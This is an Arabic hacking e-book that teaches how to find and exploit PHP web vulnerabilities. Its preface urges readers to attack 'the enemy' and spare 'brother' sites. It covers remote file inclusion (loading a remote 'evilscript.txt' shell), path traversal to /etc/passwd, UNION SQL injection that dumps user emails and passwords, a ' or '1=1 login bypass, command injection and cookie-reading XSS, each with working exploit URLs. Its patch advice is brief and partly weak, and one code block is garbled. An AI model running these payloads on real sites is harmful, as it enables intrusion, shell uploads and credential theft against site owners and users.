

بسم الله الرحمن الرحيم

# عالم التغرات

اكتشاف و استغلال التغرات 2012

(Adel SBM)

[www.the-code.tk](http://www.the-code.tk)

تأليف : Adel SBM

بسم الله الرحمن الرحيم

هذا العمل المتواضع مجاني ومتاح للجميع ,لذا أرجو استغلال كل  
معلوماته  
من هذا الكتاب في الخير ,أي عدم استهداف المواقع الشقيقة  
والتركيز على العدو الواحد ..  
اللهم إني قد بلغت.

### الإهداء:

أهدي هذا العمل المتواضع الى اخواني:  
Bek4ever-ahmed.bak-THe Don  
والى كل من ساندني:

Indoushka – Over-X - Ayme NDz

منتديات:

<http://www.noor7.com/>  
<http://www.4algeria.com/vb>  
<http://www.sa-hacker.com/vb/>  
<http://www.gaza-hacker.com/cc>

# الجزائر

2011/10/23

## الفهرس:

( مقدمة )

(1) الأدوات التي نحتاجها

(2) ثغرة [Remote File Inclusion](#) (استدعاء أو ادراج ملف بعيد):

1-2 -- مثال أساسى

2-2 -- مثال متقدم

3-2 -- كيفية الترقيق

(3) ثغرة [Local File Disclosure/Download](#) (كشف/قراءة/تحميل ملف محلي):

1-3 -- مثال أساسى

2-3 -- مثال متقدم

3-3 -- كيفية الترقيق

(4) ثغرة [SQL Injection](#) (حقن قواعد البيانات):

1-4 -- مثال أساسى

2-4 -- مثال متقدم

3-4 -- كيفية الترقيق

(5) ثغرة [SQL Injection Login Bypass](#) (تجاوز تسجيل الدخول):

1-5 -- مثال أساسى

2-5 -- مثال متقدم

3-5 -- كيفية الترقيق

(6) ثغرة [Cross-Site Scripting](#) (حقن أكواد HTML أو JAVA SCRIPT):

1-6 -- مثال أساسى

2-6 -- كيفية الترقيق

(7) ثغرة [Download Backups+ INC files](#) (تحميل و قراءة الملفات المهمة و قواعد البيانات)

1-7 -- شرح+أمثلة

2-7 -- كيفية الترقيق

(8) أمثلة حول الثغرات (من مواقع الحماية):

( خاتمة )

## مقدمة:

كثيراً ما نسمع عن لغة البرمجة PHP و أنواع الثغرات المحتملة و التي تمكنا من اختراق الموقع المصايب.

و حين نفكّر في هذا المجال حتماً نصل إلى فكرة أن الثغرة مهما كان نوعها أو برمجتها، فان اكتشافها هو أمر صعب و بالغ التعقيد...

- في الكثير من المرات و أنا أتصفح مواقع الوكير أحد أن هناك الكثير من المختصين في هذا المجال للأسف **يحتكرون** المعلومات خاصة فيما يتعلق بثغرات ال PHP غالباً يكتفون بشرح الاستغلال و يتغاهلون شرح طريقة الاكتشاف.

إذن من الآن فصاعداً لا تستجدي أو تطلب المساعدة من أحد لكي تكتشف و تستغل الثغرات.

لأنني في هذا الكتاب سأشرح كيفية اكتشاف الثغرة و استغلالها..  
وسيكون الشرح مدعوماً بأمثلة أساسية و أمثلة متقدمة نوعاً ما .

## 1) الأدوات التي نحتاجها

المطلوب منا في هذه الخطوة الأولى هو تثبيت برنامج يدعم MySQL و PHP أي تثبيت ما يعرف بالсерفر المحلي (الخادم المحلي) LOCALHOST على جهازنا. يمكنك تثبيت برنامج APPSERVE أو WAMP على سبيل المثال ، بعد التثبيت يجب اجراء بعض التعديلات البسيطة على الخادم المحلي وذلك بتعديل ملف التكوين php.ini لأن أغلب الاستغلالات تحتاج الى شروط لتطبيقها بالشكل الصحيح.

ابحث عن المعلومات التالية في ملف php.ini و عدلها بحيث تكون كما يلى :

```
safe_mode = off  
register_globals = on  
allow_url_include = on  
allow_url_fopen = on  
magic_quotes_gpc = off  
short_tag_open = on  
display_errors = on  
disabled_functions = N/A
```

بعد التعديل يجب اتباع الخطوات الآتية : أولا ، إنشاء قاعدة بيانات لاستخدامها من قبل مختلف برامج ال PHP أو ما يعرف بالسكريبتات . ثانيا ، ثبت سكريبتات مختلفة وابدء في دراسة مصدرها -أكوادها- وقم باختبارها بواسطة المتصفح.

روابط تحميل برنامج APPSERVE أو WAMP تجدها هنا: <http://www.the-code.tk/code.php?id=96>

- أنت الان تتسائل : كيف يمكنني دراسة هذه السكريبتات؟... أنا لا أعرف شيئا حول الثغرات !!!  
أقول لك لا تقلق هيا ننطلق الى عالم اكتشاف الثغرات و أكيد..استغلالها.

## (2) ثغرة Remote File Inclusion (استدعاء أو ادراج ملف بعيد):

دور هذه الثغرة واضح جدا بحيث أنها تمكنك من استدعاء ملفات خارجية والتي غالبا ما تكون شلات أو سكريبتات اختراق بالنسبة للمهاجم.

- كما أنها تعتبر من أخطر الثغرات ولكنها حاليا نادرة وذلك لتفطن المبرمجين إليها.

في لغة ال PHP توجد ثلاث دوال يمكنها أن تترجم عملية استدعاء الملف والتي قد تحدث الثغرة وهي :

require – require()  
require\_once  
include  
include\_once

### 1-2 -- مثال أساسى عن كود الثغرة:

-- لنفرض أن لدينا ملف test.php يحتوى الكود التالى:

```
<?php  
$pagina=$_GET['pagina'];  
include $pagina;  
?>
```

لنشرح الكود باختصار .الدالة include تستدعي المتغير \$pagina و المتغير في لغة PHP دائما يكون مسبوقا برمز الدولار \$ (عليك أولا أخي أن ترجع الى بعض أساسيات PHP )

- إذا قمنا برفع الملف و تصفحه بمتصفح الانترنت <http://127.0.0.1/test.php>

سنلاحظ وجود عدة أخطاء في الصفحة :

مثل هذا الخطأ (أنا أستعمل خادم WAMP) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

-سبب الخطأ هو أن المتغير \$pagina لا يزال مجهولا أو غير معروفا بالنسبة للدالة include . والاستغلال يكون عندما نعطي المتغير قيمة نحددها نحن والتي تكون رابطا للشل أو سكريبت الاختراق ويكون هذا بواسطة المتصفح وبهذا الشكل:

<http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt?>

لا تنسى أن الشل الذي تم استدعائه يجب أن يكون بصيغة ملف نصي TXT وأيضا من المهم وضع علامة الاستفهام في نهاية الرابط .

الكثيرون يتسائلون لماذا يجب وضع علامة الاستفهام ؟ أو ٥٠ % في نهاية رابط الاستغلال؟

- الاجابة ستكتشفها من خلال هذا المثال:

```
<?php  
$pagina=$_GET['pagina'];  
include $pagina.'.php';  
?>
```

-- اذا استدعيانا الشل (بدون وضع علامة الاستفهام) :

<http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt>

لن ينجح لأن الاستدعاء سيشمل النص **http://the-code.tk/evilscript.txt.php**

لذلك سوف نصيّف **00 %** أو علامة الاستفهام ؟ بعد رابط الاستغلال لكي يتم تجاهل الرموز والإضافات التي تكون بعد المتغير المستدعى وبالتالي ستنجح عملية الرابط او الادراج وسيظهر الشل.

## 2- -- مثال متقدم عن كود التغرة:

الآن مثال من سكريبت.

- مقتطف من الكود المصاّب (ملف **index.php**) :

```
if (isset($_REQUEST["main_content"])){
    $main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
    $main_content = $_SESSION["main_content"];
}
.....etc.....
ob_start();
require_once($main_content);
```

يمكّنا أن نستدعي الشل بواسطة المتغير "main\_content" و المهاجم عموماً سيطلب أي قيمة يحددها للمتغير بفضل دالة الطلب REQUEST

والاستغلال سيكون كالتالي:

[http://127.0.0.1/index.php?main\\_content=http://the-code.tk/evilscript.txt](http://127.0.0.1/index.php?main_content=http://the-code.tk/evilscript.txt)

وبالتالي سيتم استدعاء الشل بنجاح.

**ملاحظة:** بعض النصوص لا تقبل "HTTP" يمكن أن نجرب استخدام "HTTPS" أو بروتوكول نقل "FTP" الملفات

### 3- كيفية الترقيق:

طرق بسيطة : - لا تسمح باستخدام الرموز و العلامات مثل "/" في المتغيرات.  
- ابحث عن الأخطاء و حاول أن يجعل كل المتغيرات معرفة.

## (3) ثغرة Local File Inclusion/Download (كشف/قراءة/تحميل ملف محلي):

بكل بساطة فانه من خلال هذه الثغرة يمكنك قراءة محتوى ملفات الموقع المستهدف ، و حتى تحميلها.  
بعض الدوال التي تسمح لك بقراءة الملفات :

قراءة ملف كامل : file\_get\_contents

قراءة ملف : readfile

قراءة ملف كامل مرة في مصفوفة : file

فتح ملف أو رابط : fopen

عرض سورس/محتويات-كود الصفحة أو الملف : highlight\_file() - show\_source

### 1-3 -- مثال أساسى عن كود الثغرة:

-- لنفرض أن لدينا ملف test.php يحوي الكود التالي:

```
<?php  
$pagina=$_GET['pagina'];  
readfile($pagina);  
?>
```

لشرح الكود باختصار . ستحاول الدالة **readfile** قراءة محتوى الملف المحدد بالمتغير \$pagina وبالناتي في الاستغلال سنقوم بتحديد مسار الملف المراد قراءته و المخترق بطبيعة الحال سيحاول قراءة الملفات المهمة و التي تحتوي معلومات الاختراق مثل ملف config.php بالنسبة لمنتديات : vBulletin

الاستغلال سيكون بهذا الشكل:

<http://127.0.0.1/test.php?pagina=../../../../etc/passwd>

وبالتالي سيتم طلب الملف للقراءة و ليس استدعاءه من الخارج ..  
<http://127.0.0.1/test.php?pagina=../../../../etc/passwd> هي مسار الملف المراد قراءته و يتغير حسب مكونات السكريبت .

### 2- مثال متقدم عن كود الثغرة :

الآن مثال من سكريبت والملف المصاّب يسمى : **download.php** - مقتطف من الكود المصاّب:

```
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();
```

المتغير **\$file** يعبر عن الملف المطلوب وهو غير امن وتم طلبه بواسطة **\_REQUEST**. الذي يظهر في السطر الأول.  
و عن طريق الدالة () يمكننا أن نرى محتوى الملف.  
و بالتالي الاستغلال يكون كالتالي :

<http://127.0.0.1/download.php?file=../../../../etc/passwd>

حتى نتمكن من قراءة الملف المطلوب بنجاح.

### 3- كيفية الترقيق:

طرق بسيطة : - لا تسمح باستخدام الرموز و العلامات مثل "/" في المتغيرات.  
ابحث عن الأخطاء و حاول أن تجعل كل المتغيرات معرفة.

## 4) ثغرة SQL Injection (حقن قواعد البيانات):

ان ثغرة SQL Injection هي الأكثر انتشارا و تعتبر الأصعب من ناحية الاستغلال كما أنها الأشهر هذه الثغرة لوحدها تستحق كتابا لشرحها بدقة و التدقيق في استغلالاتها بداية من تحديد الجداول والأعمدة المصابة وصولا الى استخراج البيانات و من ثم المراحل المتقدمة و التي تمكنك من رفع الشل.

### 1-4 -- مثال أساسى عن كود الثغرة:

-- مقتطف من ملف test.php

```
<?php  
$id = $_GET['id'];  
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");  
?>
```

كما نلاحظ فان المتغير \$id غير مفلتر هذا يعني أنها يمكن أن نحقن أوامر SQL التي نريدها قد تتسائل ما الذي أقصده بغير مفلتر؟

-غير مفلتر من الفلترة و هي أن الكود الذي نحقنه يمكن أن يكون أوامر SQL ورموز مختلفة وليس أرقاما فقط وهذه الرموز بدورها تمثل أوامر توجه لقاعدة البيانات.

- كيفية الكشف عن وجود الثغرة باختصار :  
الأمر في غاية السهولة كل ما عليك هو اعطاء المتغير \$id قيمة تتمثل في رمز ' أو عدة حروف و هذا ما يسبب خللا في قاعدة البيانات التي تستظهر لك الخطأ و الذي يمكن أن يكون بهذا الشكل:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY `date` DESC' at line 1

و رسالة الخطأ لها عدة صيغ أخرى.

- نعود الى كيفية الاستغلال ويكون كما يلي:

[http://127.0.0.1/test.php?id=1+union+all+select+1,2,version\(\),4--](http://127.0.0.1/test.php?id=1+union+all+select+1,2,version(),4--)

وهنا سنحصل على اصدار قاعدة البيانات (الاصابة في العمود رقم 3).

## 2-4 -- مثال متقدم عن كود الثغرة :

الآن مثال من سكريبت والملف المصاّب يسمى : listing\_view.php  
- مقتطف من الكود المصاّب:

```
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals
where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$sr = mysql_fetch_array($result);
```

نلاحظ أنه سيتم تحديد قيمة المتغير \$id بواسطة الطلب itemnr والقيمة التي سنطلبها غير مفلترة . وبالتالي سنتمكن من حقن ال SQL بكل سهولة و ذلك كالتالي :

[http://127.0.0.1/house/listing\\_view.php?itemnr=null+union+all+select+1,2,3,concat\(0x3a,email,password\),5,6,7,8,9,10+from+users--](http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--)

و سنحصل على البريد الالكتروني وكلمة المرور من الجدول المستخدمين.

**ملاحظة هامة:** SQL Injection هي من أعقد الثغرات لذا لا يمكنني الان أن أشرحها بالتفصيل الممل و ان شاء الله سأصدر كتاباً كاملاً حول هذه الثغرة وسيشتمل كل تفاصيل الاستغلال من تخطي الفلترة الى استخراج المعلومات وصولاً الى رفع الشل.

## SQL Injection Login Bypass --3-4 (تجاوز تسجيل الدخول):

هذه الثغرة تعتبر من أخف و أجمل الثغرات و ذلك ببساطتها لذلك صنفتها كجزء من ثغرة SQL Injection وهي تمكّنك من الدخول الى لوحة الادارة مستعملاً الرمز ' or ' 1=1

ركز على المثال:

مثال من سكريبت والملف المصاّب يسمى : login.php  
- مقتطف من الكود المصاّب:

```
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM ". $tablestart . "login WHERE brugernavn = '$postbruger' AND
password = '$postpass'");
or die("<p>" . mysql_error() . "</p>\n");
```

يمكننا تجاوز لوحة الدخول بمجرد وضع المعلومات التالية :

admin ' or ' 1=1  
jocker

اسم المستخدم :  
كلمة السر :

أكيد أنا سنتقول كيف سيسجل دخولنا ؟ وهل سنتخد SQL بهذه البساطة ؟  
الاجابة هي نعم لأننا لو لاحظنا الأمر الذي سيطبق من طرف ال SQL سنتعرف السبب :

```
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = ' jocker'"")
```

- يجب أن تكون لديك فكرة عن طريقة التعامل مع قواعد البيانات لكي تتمكن من ترجمة الأمر الذي خدعنا به ال SQL وتمكننا من الدخول مع العلم أن اسم الدخول يجب أن يكون اسم الهدف.

#### 4-4 - كيفية الترقيع :

- لا تسمح للحروف في المتغيرات واجعلها فقط أرقاما باستخدام الامر هذا كمثال:

```
$id=(int)$_GET['id'];
```

- أو قم بمنع الحروف الخاصة والتي تحدث خللا لقاعدة البيانات :

```
- , . () ' " _ + / *
```

### 5) ثغرة Remote Command Execution (تنفيذ الأوامر):

- هذه الثغرة تصنف حسب رأيي ثاني أخطر ثغرة بعد ثغرة Remote file Inclusion وهي تسمح لك بتنفيذ أوامر مباشرة على السيرفر .

- في لغة ال PHP توجد بعض الدوال التي تسمح لك بتطبيق الأوامر وهي :

```
exec  
passthru  
shell_exec  
system
```

-- ملاحظة : إذا كان الاستغلال يتم عبر تطبيق الأوامر بدالة EXEC() فإنه لا يمكنك مشاهدة نتيجة الأوامر (ولكن يتم تنفيذ الأوامر) اذ أنها لا تطبع .

## 1-5 -- مثال أساسى عن كود الثغرة:

-- مقتطف من ملف **test.php** --

```
<?php  
$cmd=$_GET['cmd'];  
system($cmd);  
?>
```

من خلال دراسة التغرات السابقة عرفنا كيف يمكننا طلب قيمة للمتغير وهو في هذه الحالة **\$cmd** ومنه يمكننا أن نجعل الاستغلال يتم كالتالي :

<http://127.0.0.1/test.php?cmd=id>

وسيتم تنفيذ الأمر **id** (أمر عرض صلاحياتنا على السرفر) وسوف تظهر النتيجة.  
وفي حالة التجربة على السرفر المحلي سيكون الأمر من أوامر نظام الويندوز كالأمر **dir** (استعراض ملفات المجلد الحالي).

## 2-5 -- مثال متقدم عن كود الثغرة :

مثال من سكريبت والملف المصاّب يسمى : **dig.php**  
- مقتطف من الكود المصاّب:

```
$ns = $_GET['ns'];  
$query_type = $_GET['query_type']; // ANY, MX, A , etc.  
$ip = $_SERVER['REMOTE_ADDR'];  
$self = $_SERVER['PHP_SELF'];  
.....etc .....,  
$host = strtolower($host);  
echo("<span class='plainBlue'><b>Executing : <u>dig $ns </u></b><br>");  
echo '<pre>';  
system ("$ns");
```

هنا يظهر أنه يمكن للمهاجم أن يوجه أي أمر يريده من خلال المتغير **ns**  
والأمر سيوجه بالشكل الآتي :

<http://127.0.0.1/dig.php?ns=ls -la>

**إضافة هامة :** لو صادفنا كود بهذا الشكل:

```
$dz = $_GET['ns'];
$alg = $_GET['alg'];
.....
etc .....
system ("dig @$dz $alg");
?>
```

في رأيك كيف سيكون الاستغلال؟

الاجابة: الاستغلال سيكون بهذا الشكل:

<http://127.0.0.1/dig.php?dz=|| id ||&alg=ls -la>

لأن الرمز **||** يستخدم لتطبيق عدة أوامر في وقت واحد.

## :(JAVA SCRIPT أو HTML (حقن أكوا德 Cross-Site Scripting (ثغرة 6

كثيراً ما يتجاهل المبرمجون هذه الثغرة أو يتناسونها ولوهذا فهي منتشرة جداً و يمكن أن تجدها في أكبر الواقع العالمية لكن فعاليتها تكمن في قدرة المهاجم على استغلالها بطريقة ذكية.

ومنه يمكننا أن نجعل الاستغلال يتم كالتالي :

### 1-6 -- مثال أساسى عن كود الثغرة:

-- مقتطف من ملف **test.php**:

- مقتطف من الكود المصادر:

```
<?php
$name=$_GET['name'];
print $name;
?>
```

لو ترجمينا الكود فإنه يتم طلب قيمة للمتغير **\$name** ومن ثم طباعته بواسطة الدالة **print**

- لنفك حيداً في طريقة لاستغلال هذا الكود ..... ما رأيك لو نحقن كود جافا سكريبت بهذا الشكل:

[http://127.0.0.1/test.php?name=<script>alert\(document.cookie\)</script>](http://127.0.0.1/test.php?name=<script>alert(document.cookie)</script>)

النتيجة ستكون ظهور نافذة رسالة تحوي كوكيز المستخدم و هو الكوكيز الخاص بنا في هذه الحالة.

- احد طرق الاختراق تم عبر عملية تكوين رابط يحوي كود استخراج الكوكيز ثم تشفيره او اختصاره وارساله الى الضحية . عند تصفح الضحية للرابط فان معلومات الكوكيز الخاصة به سترسل الى المهاجم و هذا الأخير يقوم بالدخول الى حساب الضحية مستغلاً معلومات الكوكيز المسروقة.

## 2-6 – كيفية الترقيق :

طريقة الترقيق سهلة جدا حيث يمكننا استعمال دالة htmlentities() أو دالة htmlspecialchars() . هذه الدوال تقوم بمعاملة نصوص و وسوم HTML كنص عادي . وبالتالي الكود المرقع سيكون بهذا الشكل:

```
php?>
;(['name'=htmlentities($_GET['name$>
;print $name
;<?
```

## 7) ثغرة INC files + ثغرة Download Backups :

### 1- شرح+أمثلة :

شخصياً أعتبرهما من الأخطاء الساذحة للمبرمجين بحيث: ثغرة Download Backups : تسمح لك بتحميل النسخ الاحتياطية لقاعدة بيانات الموقع المستهدف.

مثال بسيط:

<http://127.0.0.1/adminpanel/phpmydump.php>

ثغرة INC files : وتسمح لك بقراءة بعض ملفات inc والتي تكون مكشوفة و من الممكن أن تحوي معلومات الموقع المستهدف.

مثال بسيط (قراءة ملف يحوي معلومات الاتصال بقاعدة البيانات):

<http://127.0.0.1/inc/mysql.inc>

### 2-7 – طريقة الترقيق :

التحقق من أن المدير هو الذي يريد تحميل النسخة الاحتياطية و الا التحويل إلى صفحة خطأ – استخدام جدار ناري لحماية النسخ الاحتياطية.

حماية الملفات باستخدام `.htaccess`. والأفضل هو حفظ المعلومات في ملفات بصيغة `.INC files` .`.PHP`

## (8) أمثلة حول الثغرات (من مواقع الحماية):

### Remote File Inclusion (1 ثغرة)

<http://www.1337day.com/exploits/14932>

### Local File Disclosure/Download (2 ثغرة)

<http://www.1337day.com/exploits/17087>

### SQL Injection (3 ثغرة)

<http://www.1337day.com/exploits/17021>

<http://www.1337day.com/exploits/14836>

<http://www.1337day.com/exploits/14828>

### Remote Command Execution (4 ثغرة)

<http://www.1337day.com/exploits/1503>

### Cross-Site Scripting (5 ثغرة)

<http://www.1337day.com/exploits/17073>

## خاتمة:

من المعروف أنه توجد عدة أنواع من التغرات تختلف من حيث الخطورة و كيفية الاستغلال ولكن كل هذا يعتمد على قدرة المهاجم و ذكائه ، أخي لقد حاولت أن أقربك أكثر إلى عالم التغرات و من المؤكد أنه كلما اجتهدت أكثر كلما وصلت إلى مرحلة متقدمة من الاحتراف...و اذرونني ان وردت مني أخطاء على المستوى النحوي أو الاملائي أو على مستوى الشرح فالكمال لله عز وجل...

**لتعليقاتكم واقتراحاتكم واستفساراتكم حول الكتاب أرجو  
راسلتي عبر البريد الالكتروني:**

**Madrido.Jocker@gmail.com**

**أو يرجى زيارة الموقع :**

**http://www.the-code.tk**

**أو التواصل عبر : SKYPE**

**Adel SBM**

**أرجو الدعاء لي ولوالدي**

2011/10/23

تم بحمد الله